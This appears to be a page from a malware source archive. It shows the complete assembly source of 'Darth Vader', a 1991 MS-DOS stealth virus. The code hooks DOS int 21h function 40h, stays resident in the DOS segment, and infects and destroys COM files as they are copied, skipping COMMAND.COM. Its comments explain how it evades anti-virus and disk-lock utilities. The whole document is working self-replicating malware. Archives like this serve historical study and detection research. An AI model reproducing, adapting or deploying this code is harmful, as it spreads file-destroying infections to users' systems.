MalwareSourceCode/MSDOS/D-Index/Virus.MSDOS.Unknown.darth1.asm

164 lines
5.1 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;*******************************************************************************
;* *
;* D A R T H V A D E R - stealth virus *
;* *
;* (C) - Copyright 1991 by Waleri Todorov, CICTT *
;* All Rights Reserved *
;* *
;* Virus infect ANY com file exept COMMAND.COM. He use iternal DOS *
;* dispatcher for int21 functions, so it cannot be stoped by programs *
;* like ANTI4US etc... He also cannot be stoped by disk lock utilities *
;* because the virus use WRITE function (40h) of DOS' int21. *
;* Always when you copy COM file with DOS' 'copy' command or PCTools *
;* class programm, you will receive infected (destroyed) copy of file *
;* Infected file won't work, but the virus WILL *
;* *
;* Waleri Todorov *
;* *
;*******************************************************************************
nop ; Dummy NOPs. Required
nop
mov ah,30h ; Get DOS version
int 21h
cmp al,5 ; If DOS is NOT 5.X
jb OkDOS ; Continue
Exit ; else terminate
int 20h
OkDos
mov ax,1203h ; Get DOS segment
int 2fh ; Via interrupt 2F (undocumented)
mov si,9000h ; Set ES to 9000
mov es,si ; Usualy this area is fill with zeros
xor si,si ; SI=0
Next
inc si ; Next byte
cmp si,0F00h ; If SI==0xF00
ja Exit ; Then no place found and exit to DOS
push si ; else Save SI in stack
xor di,di ; ES:DI == 9000:0000
mov cx,offset lastbyte-100h ; Will check virus size
repe cmpsb ; Check until equal
jcxz Found ; if CX==0 then place is found
pop si ; else restore SI from stack
jmp short Next ; and go search next byte
Found
pop di ; Restore saved SI to DI
mov cs:MyPlace,di ; Save new offset in DOS segment
mov [2],di ; at DOSSEG:0002
mov si,100h ; SI will point beginning in file
push ds ; Save DS
push ds ; Set ES equal to DS
pop es ;
push cs ; Set DS=CS
pop ds ;
mov cx,offset LastByte-100h ; Will move virus size only
rep movsb ; Do move
pop ds ; Restore DS (point to DOSSEG)
push si ; From this place will search DOS table
NextTable
pop si ;
inc si ; Next byte
jz Exit ; If segment end then exit
push si ; Save SI
lodsw ; Load AX from DS:SI
xchg ax,bx ; Put AX in BX
lodsb ; and load AL from DS:SI
cmp bx,8B2Eh ; Check for special bytes
jne NextTable ; in AL and BX
cmp al,9Fh
jne NextTable ; If not match -> search next byte
FoundTable
lodsw ; Else load table address to AX
xchg ax,bx ; Put table address to BX
mov si,[bx+80h] ; Load current offset of 40h function
mov di,offset Handle ; Put its offset to DI
mov cx,5 ; Will check 5 bytes only
push cs ; ES:DI point handling of 40 in file
pop es
repe cmpsb ; Check if DS:SI match to ES:DI
jcxz Exit ; If match -> virus is here -> Exit
mov ax,[bx+80h] ; else load offset of function 40
mov [4],ax ; And save it to DOSSEG:0004
mov ax,offset Handle-100h ; Load absolute address of
add ax,cs:MyPlace ; new handler and adjust its location
mov [bx+80h],ax ; Store new address in DOS table
int 20h ; Now virus is load and active
Handle ; Handle function 40h of int 21
push ax ; Save important registers
push bx
push cx
push ds
push es
push si
push di
cmp cx,270d ; Check if write less than virus size
jb Do ; If so -> write with no infection
mov cs:[0C00h],ds ; Save buffer segment in DOSSEG:0C00
mov cs:[0C02h],dx ; Save buffer offset in DOSSEG:0C02
mov ax,1220h ; Get number of File Handle table
int 2fh ; Via int 2F (undocumented)
mov bl,es:[di] ; Load number to BL
mov ax,1216h ; Get File Handle table address
int 2fh ; Via int 2F (undocumented)
push di ; Save table offset
add di,20h ; Now offset point to NAME of file
push cs ; DS now will point in virus
pop ds
mov si,offset Command-100h ; Address of string COMM
add si,cs:[2] ; Adjust for different offset in DOS
mov cx,4 ; Check 4 bytes
repe cmpsb ; Do check until equal
pop di ; Restore address of table
jcxz Do ; If match -> file is COMMand.XXX
add di,28h ; Else DI point to EXTENSION of file
mov si,offset Com-100h ; Address of string COM
add si,cs:[2] ; Adjust for different offset in DOS
mov cx,3 ; Check 3 bytes
repe cmpsb ; Do check until equal
jne Do ; If NOT *.COM file -> write normal
mov di,cs:[0C02h] ; Else restore data buffer from
mov es,cs:[0C00h] ; DOSSEG:0C00 & DOSSEG:0C02
mov si,cs:[2] ; Get virus start offset
mov cx,offset LastByte-100 ; Will move virus only
rep movsb ; Move its code in data to write
; Now virus is placed in data buffer of COPY command or PCTools etc...
; When they write to COM file they write virus either
Do
pop di ; Restore importatnt registers
pop si
pop es
pop ds
pop cx
pop bx
pop ax
db 36h,0FFh,16h,4,0 ; CALL SS:[4] (call original 40)
ret ; Return to caller (usualy DOS)
Command db 'COMM' ; String for check COMMand.XXX
Com db 'COM' ; String for check *.COM
db 'Darth Vader' ; Signature
LastByte nop ; Mark to calculate virus size
MyPlace
dw 0 ; Temporary variable. Not writed
2021-01-12 23:38:47 +00:00